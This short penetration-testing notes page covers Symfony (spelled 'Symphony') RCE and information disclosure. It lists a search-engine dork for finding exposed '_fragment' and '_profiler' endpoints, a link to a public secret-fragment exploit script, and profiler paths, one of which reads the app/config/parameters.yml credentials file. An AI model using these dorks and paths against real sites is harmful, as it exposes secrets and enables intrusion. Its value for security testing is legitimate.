> For the complete documentation index, see [llms.txt](https://blog.s1rn3tz.ovh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.s1rn3tz.ovh/pentest-web/autre/symphony.md).

# Symphony

## Symphony rce & information disclosure

inurl:"\_fragment" | inurl:"\_profiler"

Exploit: <https://github.com/ambionics/symfony-exploits/blob/main/secret_fragment_exploit.py>

```
_profiler
_profiler/phpinfo
_profiler/open?file=app/config/parameters.yml
```
